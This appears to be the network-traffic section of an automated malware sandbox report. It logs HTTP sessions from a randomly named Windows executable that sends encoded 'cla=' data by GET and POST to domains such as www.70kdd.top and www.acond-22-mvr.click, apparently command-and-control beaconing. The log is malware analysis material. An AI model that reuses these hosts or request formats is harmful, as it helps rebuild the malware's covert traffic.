                                                                                                            Data Ascii: cla=NFwfoXbecwawX5kLpBr9/PloY86k+tDQc0/SQBduD+4VTRrM6rFF944uUz30F1eYzT/XmzP2hEypdL5uPtIUsN3egXxglp5p04gQ9KTg0BCe2vUSJAbcGWAh81hD9eg29rLv8AtqbdJizwUKxKV78Hs2LGqPGu1IR9cB2p/eYpESppCyu+mdsyl9DD/EoifiVHD9ptn9rOkGrVNxPVKUe0xFv/v3dJH14p8mHKfzHvxDOAIm7T6HWQ8fAhwJ61p4WolMNUhDv0/9ATAzSnI9gj7TCoTvRp4qlyJcPHMjsGYHSBGio9aLVQ3sqqsLuqVyETQEWOjg/kk4wLeVCvIPefDpUx8XxEo2lOCd+XN8KCs6gd54mZmQ3NC0rxX/bwBLbVrZxfKQoiMSrmr9mDsUVkffmoSDjbM8SXDom9AjoyTX7OrkTU8QiHcsLpgFNlbpibodLtrpOm9gFmo+nP4V5D2KilNr9fRqA0eKjeKQjq9L5Sj82jTV8iSODlemq1P0U+ZuF0T0N7+QTL7qSSuptd2/uqfL715OMoGaagrwY21iP9EqhpqYOlRzpYlZPlIn9R42ytRuFMlzWpGTp9f/cOt5ukuOVg3YgRSC9hXMasI/xfAFeFi8SKLBboR/odoa+afw65A51LpM8V3YIg20dONwA+rLU8Vb9eWKVNqPV0urqlezbJjl1EiRCV6qCaajDM/DWCFuERTUVw1RmlRRlPKfYff6dw3EUN3Rbq1FBnJN9R0Aguz4dvbiTpA3qLyJ5xVDEVstNvo6NCIIS41wiGs1WtV9MroWgtbQ//jO/Q8gEEddqVUC0RdZwDuH5reUabqzLqgLTEdPtDKetLqTtETqh8gmfzMXHQY6MyStYCm2tSWhqItqGefQeaOUiJZ/+EuYSjzmYDHmnW4GHVUnSEe/tgXSHcEi9SBpOXNSkeIhX0A4gkn6jbme2bd5UMuCYLUEE8TP5w68U+RgiKGKQplnVy69l/4vopW2NFE2zazfrMV2 [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.54978638.47.232.124802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:55:36.363432884 CET347OUTGET /klhq/?cla=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ieDRvxIHzah5xLQe7b3R0zi9v/9+L2XqTgkk9lBsx9pauw==&jbeXk=EHbdQPuX HTTP/1.1
                                                                                                            Host: www.70kdd.top
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Nov 22, 2024 07:55:37.999794960 CET312INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:55:37 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 148
                                                                                                            Connection: close
                                                                                                            ETag: "66e01838-94"
                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.549806199.59.243.227802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:55:43.927213907 CET622OUTPOST /w9z4/ HTTP/1.1
                                                                                                            Host: www.acond-22-mvr.click
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.acond-22-mvr.click
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 204
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 55 2f 6f 62 54 59 45 72 4d 61 32 75 78 4f 6e 71 2b 43 4d 55 56 64 43 4d 2b 5a 6d 4e 76 64 44 2b 31 44 74 54 45 56 64 62 2f 72 46 41 79 55 32 55 38 62 30 33 46 2b 4a 52 77 70 47 49 54 42 38 38 53 46 46 42 34 4d 62 52 38 6d 6c 4d 51 61 53 44 4f 5a 51 50 52 4e 77 59 54 65 4a 42 7a 39 36 73 31 76 39 61 67 67 65 57 75 34 4b 31 5a 66 51 6c 37 34 45 54 45 35 71 36 72 54 36 68 73 44 53 30 6c 79 2b 72 4a 7a 79 61 39 41 43 4d 50 36 4a 68 6e 69 47 55 46 51 44 64 4e 75 35 77 57 4d 4d 65 69 69 75 31 44 55 73 6a 38 69 4e 76 79 56 61 41 6d 6e 73 43 42 51 61 71 6a 6f 3d
                                                                                                            Data Ascii: cla=3+GoTPvyTIkI2U/obTYErMa2uxOnq+CMUVdCM+ZmNvdD+1DtTEVdb/rFAyU2U8b03F+JRwpGITB88SFFB4MbR8mlMQaSDOZQPRNwYTeJBz96s1v9aggeWu4K1ZfQl74ETE5q6rT6hsDS0ly+rJzya9ACMP6JhniGUFQDdNu5wWMMeiiu1DUsj8iNvyVaAmnsCBQaqjo=
                                                                                                            Nov 22, 2024 07:55:45.004997015 CET1236INHTTP/1.1 200 OK
                                                                                                            date: Fri, 22 Nov 2024 06:55:44 GMT
                                                                                                            content-type: text/html; charset=utf-8
                                                                                                            content-length: 1138
                                                                                                            x-request-id: bdda98a2-2a46-4d4f-b6e5-91f6766d10f5
                                                                                                            cache-control: no-store, max-age=0
                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                            set-cookie: parking_session=bdda98a2-2a46-4d4f-b6e5-91f6766d10f5; expires=Fri, 22 Nov 2024 07:10:44 GMT; path=/
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                            Nov 22, 2024 07:55:45.005063057 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmRkYTk4YTItMmE0Ni00ZDRmLWI2ZTUtOTFmNjc2NmQxMGY1IiwicGFnZV90aW1lIjoxNzMyMjU4NT


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.549811199.59.243.227802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:55:46.801234007 CET642OUTPOST /w9z4/ HTTP/1.1
                                                                                                            Host: www.acond-22-mvr.click
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.acond-22-mvr.click
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 224
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 78 76 6f 5a 30 45 45 73 73 61 78 68 52 4f 6e 77 4f 43 79 55 56 42 43 4d 36 6f 37 4e 39 35 44 6e 52 48 74 51 46 56 64 65 2f 72 46 4c 53 55 7a 4c 73 62 4a 33 46 6a 38 52 79 74 47 49 54 56 38 38 54 31 46 41 4c 55 61 65 4d 6d 6e 4b 51 61 63 4d 75 5a 51 50 52 4e 77 59 54 4c 69 42 77 4e 36 76 46 66 39 61 46 41 66 49 2b 34 4e 2f 35 66 51 68 37 34 41 54 45 35 49 36 70 6e 55 68 75 4c 53 30 6c 69 2b 73 59 7a 74 54 39 41 49 43 76 37 39 77 43 66 34 52 47 49 4c 42 75 54 48 6f 32 41 33 66 55 54 45 76 68 63 45 77 63 4f 31 2f 68 64 74 52 57 47 46 59 69 41 71 30 30 2b 4e 61 73 38 66 6c 6d 2b 53 61 73 78 54 46 57 4d 54 44 6f 54 7a
                                                                                                            Data Ascii: cla=3+GoTPvyTIkI2xvoZ0EEssaxhROnwOCyUVBCM6o7N95DnRHtQFVde/rFLSUzLsbJ3Fj8RytGITV88T1FALUaeMmnKQacMuZQPRNwYTLiBwN6vFf9aFAfI+4N/5fQh74ATE5I6pnUhuLS0li+sYztT9AICv79wCf4RGILBuTHo2A3fUTEvhcEwcO1/hdtRWGFYiAq00+Nas8flm+SasxTFWMTDoTz
                                                                                                            Nov 22, 2024 07:55:47.945991993 CET1236INHTTP/1.1 200 OK
                                                                                                            date: Fri, 22 Nov 2024 06:55:47 GMT
                                                                                                            content-type: text/html; charset=utf-8
                                                                                                            content-length: 1138
                                                                                                            x-request-id: d4e0efec-9af5-4742-9dfe-7baf37e30861
                                                                                                            cache-control: no-store, max-age=0
                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                            set-cookie: parking_session=d4e0efec-9af5-4742-9dfe-7baf37e30861; expires=Fri, 22 Nov 2024 07:10:47 GMT; path=/
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                            Nov 22, 2024 07:55:47.946059942 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDRlMGVmZWMtOWFmNS00NzQyLTlkZmUtN2JhZjM3ZTMwODYxIiwicGFnZV90aW1lIjoxNzMyMjU4NT


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.549817199.59.243.227802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:55:49.538902044 CET1659OUTPOST /w9z4/ HTTP/1.1
                                                                                                            Host: www.acond-22-mvr.click
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.acond-22-mvr.click
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 1240
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 78 76 6f 5a 30 45 45 73 73 61 78 68 52 4f 6e 77 4f 43 79 55 56 42 43 4d 36 6f 37 4e 39 78 44 37 30 54 74 53 6d 39 64 5a 2f 72 46 43 79 55 49 4c 73 62 59 33 46 72 6e 52 79 68 38 49 52 74 38 2f 78 39 46 4a 61 55 61 4a 38 6d 6e 49 51 61 64 44 4f 59 53 50 52 64 4b 59 54 62 69 42 77 4e 36 76 47 58 39 54 77 67 66 50 4f 34 4b 31 5a 66 55 6c 37 34 6b 54 45 78 79 36 70 7a 71 68 65 72 53 30 46 53 2b 70 75 76 74 59 39 41 47 42 76 37 6c 77 43 62 64 52 46 73 74 42 76 33 39 6f 31 67 33 53 46 2b 75 30 43 5a 61 74 76 57 44 74 41 38 55 50 47 61 6c 52 51 77 47 35 44 4b 75 58 63 34 4b 7a 6a 36 6d 62 34 34 4c 63 6e 30 49 4b 34 36 4a 42 6d 57 70 51 6e 43 64 7a 4a 4d 42 71 4e 63 34 52 64 41 39 63 71 53 72 56 6f 6a 65 79 44 67 4b 61 62 56 78 6d 42 51 54 65 39 6e 7a 72 6c 53 45 38 4b 67 62 6e 63 30 4f 41 7a 43 51 4b 36 6f 6b 39 79 75 46 39 47 4c 67 46 45 71 6d 65 44 2f 58 4a 54 64 59 66 33 62 55 5a 43 51 50 76 71 39 5a 71 51 69 37 79 7a 6d 73 6a 56 77 37 6d 7a 75 52 73 47 [TRUNCATED]
                                                                                                            Data Ascii: cla=3+GoTPvyTIkI2xvoZ0EEssaxhROnwOCyUVBCM6o7N9xD70TtSm9dZ/rFCyUILsbY3FrnRyh8IRt8/x9FJaUaJ8mnIQadDOYSPRdKYTbiBwN6vGX9TwgfPO4K1ZfUl74kTExy6pzqherS0FS+puvtY9AGBv7lwCbdRFstBv39o1g3SF+u0CZatvWDtA8UPGalRQwG5DKuXc4Kzj6mb44Lcn0IK46JBmWpQnCdzJMBqNc4RdA9cqSrVojeyDgKabVxmBQTe9nzrlSE8Kgbnc0OAzCQK6ok9yuF9GLgFEqmeD/XJTdYf3bUZCQPvq9ZqQi7yzmsjVw7mzuRsGu9/RRTSIJPoXRAJcQsFBbmdxolp6kvFEzZEjh3WVyvfHPgdpEQR4eJJbvLuR1nEmYnpKL+7vNejgkuK6P2HkFJirFjpRtft1d5yqHfhsixPZskXlpzoiIjyuOUgJNkWl+si+bluT+QTQlDX2gX4S2wnavBzQa8s8dx07JyiMvRnkgHylOh7h9aR2ZSxTqcLWkKt/E5yiUnqf9U6NjU4mUTlUuxwydJ6A3Bd7PFcb88gfuyPt4jks/tif8Ivr+7a/41UWmpvpjUdK7pU0Ow+pklC3XXhEsxcXgvfYu+El9JfXfj5rE3hRBc0jQlUSsuiKsl3kT2KEUEpsfKSOjHKwRwk271gy+N+F00QGB1Se2mUk/HOqJc3UUUAsMnsEwmdKp/VJr8aNsGxGXW6HKOZD7CXPbu2q54Seb29idKkMq1nl56K+j74QyzGvFNS0myDFM2ZOOgNnAxnKKEf3V3oX1mTj1U3NDmyhEk+t3Jj6l5e0ijT+DCW1PSq6PFDcnl+mCwmLfqgH1phmY7madKYvy5VcCUyUo9zH9yuHWkqIoz1Idc/EVgMR2Rscd8kKp8reBaMX+HUO+53dULV6o17HMS9xqtNo8JmqQ1YNvP/7qED112QDs+Sn5zHrbQKwYcQnBrrFb8pLWwCFu2Sn8Yr85XYHWLdXes0NCx [TRUNCATED]
                                                                                                            Nov 22, 2024 07:55:50.646589994 CET1236INHTTP/1.1 200 OK
                                                                                                            date: Fri, 22 Nov 2024 06:55:50 GMT
                                                                                                            content-type: text/html; charset=utf-8
                                                                                                            content-length: 1138
                                                                                                            x-request-id: c6ce5037-a392-44d0-92a8-f40d084c7660
                                                                                                            cache-control: no-store, max-age=0
                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                            set-cookie: parking_session=c6ce5037-a392-44d0-92a8-f40d084c7660; expires=Fri, 22 Nov 2024 07:10:50 GMT; path=/
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                            Nov 22, 2024 07:55:50.646948099 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzZjZTUwMzctYTM5Mi00NGQwLTkyYTgtZjQwZDA4NGM3NjYwIiwicGFnZV90aW1lIjoxNzMyMjU4NT


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.549824199.59.243.227802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:55:52.190720081 CET356OUTGET /w9z4/?jbeXk=EHbdQPuX&cla=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ== HTTP/1.1
                                                                                                            Host: www.acond-22-mvr.click
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Nov 22, 2024 07:55:53.295386076 CET1236INHTTP/1.1 200 OK
                                                                                                            date: Fri, 22 Nov 2024 06:55:52 GMT
                                                                                                            content-type: text/html; charset=utf-8
                                                                                                            content-length: 1498
                                                                                                            x-request-id: 9c1adc41-be3d-477d-be5b-f5a609875e23
                                                                                                            cache-control: no-store, max-age=0
                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cAbmHhXfzW4KYLGDQcxM+kSPXKt/1QEN1IPeBpGZI4T34FmTFAkwQkwNlAZZw1gtUo91u2rcUYustpatwC8YLg==
                                                                                                            set-cookie: parking_session=9c1adc41-be3d-477d-be5b-f5a609875e23; expires=Fri, 22 Nov 2024 07:10:53 GMT; path=/
                                                                                                            connection: close
